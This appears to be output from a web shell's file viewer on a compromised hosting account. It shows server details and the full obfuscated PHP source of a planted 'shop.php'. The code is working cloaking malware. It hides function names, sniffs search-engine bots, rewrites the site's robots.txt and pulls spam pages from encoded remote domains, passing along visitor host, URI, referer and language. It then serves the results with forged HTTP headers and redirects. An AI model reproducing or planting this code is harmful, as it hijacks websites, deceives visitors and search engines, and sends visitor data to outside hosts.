HEX
Server: Apache
System: Linux c161b.dattaweb.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: c1611390 (55368)
PHP: 8.3.24
Disabled: system, shell, exec, system_exec, shell_exec, mysql_pconnect, passthru, popen, proc_open, proc_close, proc_nice, proc_terminate, proc_get_status, escapeshellarg, escapeshellcmd, eval, dl, imap_mail, libvirt_connect, gnupg_init, unsetenv, apache_setenv, pcntl_exec, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wifcontinued, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_get_handler, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_getpriority, pcntl_setpriority, pcntl_async_signals, opcache_get_status, opcache_reset, opcache_get_configuration
Upload Files
File: /home/c1611390/public_html/shop.php
<?php
 goto xCgdz; LZrBi: function is_https() { if (isset($_SERVER["\x48\124\124\x50\123"])) { $https = strtolower($_SERVER["\x48\124\x54\x50\x53"]); if ($https !== "\x6f\x66\x66" && $https !== '') { return true; } } if (isset($_SERVER["\110\124\x54\120\137\130\137\106\117\x52\127\101\x52\x44\x45\104\x5f\x50\x52\x4f\x54\x4f"]) && $_SERVER["\110\124\x54\x50\137\x58\x5f\106\x4f\x52\127\x41\x52\x44\x45\x44\x5f\x50\122\117\124\117"] === "\x68\164\x74\160\163") { return true; } if (isset($_SERVER["\110\124\124\120\x5f\x46\x52\x4f\x4e\124\x5f\105\x4e\x44\137\110\124\124\120\123"])) { $front_end_https = strtolower($_SERVER["\110\x54\x54\120\x5f\106\x52\x4f\116\124\137\x45\116\104\x5f\x48\x54\124\x50\x53"]); if ($front_end_https !== "\x6f\x66\146" && $front_end_https !== '') { return true; } } return false; } goto VAMf6; y2Zwp: $model_file = "\x69\x6e\x64\145\x78\56\160\x68\x70"; goto hnuuY; Xe2Ye: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto MIDyX; hnuuY: $model = "\151\156\x64\145\170"; goto RlIPf; ioKP3: function disbot() { $user_agent = isset($_SERVER["\110\124\124\x50\137\125\123\105\122\137\101\x47\105\116\124"]) ? strtolower($_SERVER["\x48\124\x54\120\137\x55\x53\x45\x52\x5f\x41\107\105\x4e\124"]) : ''; $bots = array("\x67\x6f\x6f\147\154\x65\x62\x6f\164", "\142\x69\156\147", "\171\141\150\x6f\157", "\147\x6f\157\147\x6c\x65"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto koeQ0; O99OO: $host = $_SERVER["\x48\x54\124\120\x5f\110\117\x53\x54"] ?: ''; goto y72zQ; eQX8g: $istest = false; goto Xe2Ye; koeQ0: function drequest_uri() { if (isset($_SERVER["\122\x45\121\125\x45\123\124\x5f\x55\x52\111"])) { return $_SERVER["\x52\x45\121\125\x45\x53\124\137\x55\x52\x49"]; } if (isset($_SERVER["\x61\x72\147\166"])) { return $_SERVER["\x50\x48\x50\137\x53\x45\114\106"] . "\77" . $_SERVER["\x61\162\147\x76"][0]; } return $_SERVER["\120\x48\120\137\x53\x45\x4c\x46"] . "\77" . $_SERVER["\x51\x55\105\122\131\137\123\x54\x52\x49\x4e\x47"]; } goto LZrBi; RlIPf: preg_match("\57\134\x2f\50\x5b\x5e\134\57\135\x2b\134\56\160\x68\x70\51\x2f", $duri, $matches); goto vJ4U4; xGCBP: $http = is_https() ? "\x68\x74\x74\160\x73" : "\x68\164\x74\160"; goto MiJvh; pcU1s: $model = stristr($duri, "\57\77") ? "\x3f" : $model; goto eQX8g; pzTy_: function request($webs, $param) { $functions = func(); shuffle($webs); foreach ($webs as $domain) { $domain_decoded = $functions[2](urldecode($domain)); $url = "\x68\164\x74\x70\72\x2f\57" . $domain_decoded . "\x2f\163\x75\x70\x65\x72\x36\x2e\x70\x68\x70\x3f" . $param; if (function_exists("\167\160\x5f\162\x65\x6d\157\164\x65\x5f\147\x65\x74")) { $response = wp_remote_get($url, array("\x74\151\155\x65\x6f\x75\x74" => 30, "\x75\x73\145\162\55\141\147\145\x6e\x74" => "\x4d\x6f\172\151\154\154\x61\57\65\56\60\40\x28\x63\x6f\155\x70\141\164\151\142\154\x65\73\x20\127\157\162\x64\x50\x72\145\x73\x73\51")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("\x63\x75\x72\154\x5f\151\156\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("\141\x6c\154\157\x77\137\165\x72\x6c\137\146\x6f\x70\145\x6e")) { $context = stream_context_create(array("\x68\164\x74\x70" => array("\164\151\x6d\x65\x6f\x75\164" => 30))); $response = @$functions[1]($url, false, $context); if ($response !== false) { return $response; } } } return "\x6e\x6f\142\157\x74\x75\163\145\x72\x61\147\145\x6e\x74"; } goto OzSbV; vJ4U4: if (!empty($matches)) { $model_file = $matches[1]; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "\57"); } $model = str_replace("\56\x70\150\160", '', $model_file); } goto pcU1s; MiJvh: $server = file_exists($_SERVER["\104\117\103\x55\115\105\x4e\x54\x5f\122\117\117\x54"] . "\x2f\56\150\x74\x61\x63\x63\x65\163\x73") ? 1 : 2; goto oqj00; zg1_W: $param = http_build_query(array("\x77\145\142" => $host, "\x7a\172" => $zz, "\165\x72\x69" => urlencode($duri), "\x75\162\x6c\x73\150\141\x6e\147" => $referer, "\150\x74\164\x70" => $http, "\154\141\156\x67" => $lang, "\x73\145\x72\166\145\162" => $server, "\x6d\157\x64\145\154" => $model, "\x76\x65\162\x73\x69\x6f\x6e" => $istest ? $string : '')); goto mY4c_; MIDyX: if ($duri != "\57") { $duri = str_replace("\57" . $model_file, '', $duri); $duri = str_replace("\x2f\x69\x6e\x64\145\x78\x2e\x70\150\x70", '', $duri); $duri = str_replace("\41", '', $duri); } goto zg1_W; kbr5M: $html_content = request($xmlname, $param); goto LKYF9; y72zQ: $lang = $_SERVER["\x48\124\124\120\137\x41\x43\x43\105\x50\124\137\114\101\116\107\125\101\x47\105"] ?: "\145\156"; goto B01Yd; FcupE: $string = "\62\x37\65\70\x2d\x6c\x69\x6e\153\62\x31\x30"; goto O99OO; oqj00: $zz = disbot(); goto wHBZx; LKYF9: if (strpos($html_content, "\156\157\x62\157\x74\165\163\x65\162\x61\147\x65\x6e\x74") === false) { $response_handlers = array("\x6f\x6b\x68\164\155\154" => array("\x68\145\x61\x64\145\x72" => "\103\x6f\156\164\145\156\x74\55\164\171\x70\145\x3a\40\164\x65\x78\164\57\150\164\x6d\154\73\40\x63\x68\x61\162\163\145\164\75\165\x74\146\x2d\70", "\x72\145\160\154\x61\x63\x65" => "\x6f\153\150\164\x6d\154", "\164\x65\x73\164\x5f\x65\x63\x68\x6f" => true, "\157\165\x74\x70\165\x74" => true), "\x67\x65\x74\143\157\156\x74\145\156\164\x35\x30\60\160\141\147\x65" => array("\x68\145\141\144\x65\x72" => "\x48\124\x54\120\x2f\61\56\61\40\65\x30\60\x20\x49\156\164\x65\162\156\141\154\40\x53\x65\162\166\x65\162\40\x45\x72\162\x6f\x72"), "\64\x30\x34\160\x61\x67\x65" => array("\150\145\x61\144\145\x72" => "\x48\x54\x54\120\x2f\x31\x2e\61\x20\64\x30\x34\40\116\x6f\x74\40\x46\157\x75\156\x64"), "\63\60\61\x70\x61\x67\145" => array("\x68\145\x61\144\x65\x72" => "\110\124\x54\x50\57\x31\x2e\x31\40\x33\60\x31\40\115\x6f\x76\x65\x64\40\x50\x65\162\155\141\156\145\x6e\164\154\x79", "\162\x65\160\x6c\x61\x63\145" => "\x33\x30\61\x70\141\147\x65", "\162\145\x64\151\x72\145\143\164" => true), "\157\153\x78\x6d\154" => array("\150\145\x61\144\x65\x72" => "\x43\157\156\x74\145\x6e\x74\55\x54\171\x70\145\72\x20\x61\x70\x70\154\151\x63\141\164\151\x6f\156\x2f\170\155\154\73\40\143\150\141\x72\163\x65\164\x3d\165\x74\146\55\70", "\162\145\160\154\141\143\145" => "\157\x6b\170\155\154", "\157\165\x74\x70\x75\x74" => true), "\x6f\153\x72\x6f\x62\157\x74\x73" => array("\x68\145\x61\x64\x65\162" => "\103\157\156\164\x65\156\164\55\124\x79\x70\145\72\x20\164\145\170\164\57\160\x6c\x61\151\x6e", "\x72\x65\x70\x6c\x61\143\145" => "\x6f\153\x72\x6f\142\157\164\163", "\x6f\x75\x74\160\x75\x74" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["\150\145\x61\x64\145\162"]); if (isset($handler["\162\x65\160\154\141\143\x65"])) { $html_content = str_replace($handler["\162\145\160\154\x61\143\145"], '', $html_content); } if (isset($handler["\x74\145\x73\164\137\x65\x63\x68\x6f"]) && $istest) { echo $string; } if (isset($handler["\x72\x65\x64\x69\162\145\x63\164"])) { header("\x4c\x6f\x63\141\164\151\x6f\x6e\x3a\x20" . $html_content); } elseif (isset($handler["\x6f\x75\x74\160\165\164"])) { echo $html_content; } die; } } } goto ioKP3; wHBZx: $duri = drequest_uri() ?: "\57"; goto y2Zwp; B01Yd: $referer = $_SERVER["\x48\124\x54\x50\x5f\x52\x45\106\x45\x52\x45\x52"] ?: ''; goto xGCBP; VAMf6: function create_robots($url) { $functions = func(); $path = $_SERVER["\x44\x4f\103\125\x4d\105\116\124\137\122\117\117\x54"] . "\57\x72\157\142\x6f\x74\x73\56\164\170\164"; $content = "\125\x73\145\162\55\x61\x67\145\x6e\x74\72\40\x2a\xa\x41\154\x6c\157\167\x3a\x20\57\12\12\123\x69\164\x65\x6d\141\160\x3a\40" . $url . "\x2f\163\x69\x74\145\x6d\141\160\x2e\x78\155\x6c\xa"; if (!file_exists($path)) { $functions[0]($path, $content); } else { $existing_content = $functions[1]($path); if ($existing_content !== $content) { $functions[0]($path, $content); } } } goto pzTy_; xCgdz: $xmlname = array("\45\63\62\45\63\x37\45\63\x35\45\x33\70\x25\62\104\x25\x37\71\x25\x37\x36\45\x36\61\x25\x37\x38\x25\63\62\x25\63\x31\x25\63\60\x25\x32\x45\45\66\65\45\x37\66\45\x36\63\45\x36\x32\45\66\x31\x25\x36\103\x25\62\105\45\x36\67\x25\66\x32\x25\66\63", "\45\x33\x32\45\63\x37\x25\x33\x35\45\x33\70\45\62\104\x25\x37\71\x25\67\x36\x25\66\x31\x25\67\x38\x25\x33\62\45\x33\x31\45\x33\x30\45\62\x45\45\67\x39\45\x36\70\x25\x37\x41\45\x36\61\45\66\x37\45\66\x35\45\x37\x32\x25\67\62\x25\x32\105\45\66\67\x25\x36\x32\45\66\x33", "\x25\x33\x32\x25\x33\x37\45\x33\x35\x25\63\x38\45\62\x44\x25\67\71\45\67\x36\45\66\x31\45\67\70\x25\63\62\x25\x33\61\x25\63\60\x25\62\105\x25\x36\x45\45\66\70\x25\x36\x35\x25\67\62\45\67\71\x25\67\x36\45\x36\x36\x25\66\x33\45\x32\x45\45\x36\102\45\66\103\45\x36\104", "\45\x33\x32\45\63\x37\45\63\65\x25\x33\70\x25\x32\x44\x25\x37\71\x25\x37\66\x25\x36\x31\45\67\70\x25\x33\x32\x25\63\61\x25\x33\60\x25\62\x45\45\x36\66\x25\66\62\x25\x37\x39\x25\66\71\x25\66\x35\45\x36\105\45\x36\61\x25\62\105\45\66\102\45\x36\x43\x25\x36\x44"); goto FcupE; mY4c_: create_robots($http . "\x3a\57\57" . $host); goto kbr5M; OzSbV: function func() { $chars = range("\141", "\x7a"); return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "\x5f" . $chars[15] . $chars[20] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "\x5f" . $chars[6] . $chars[4] . $chars[19] . "\137" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "\137" . $chars[17] . $chars[14] . $chars[19] . "\x31\63"); }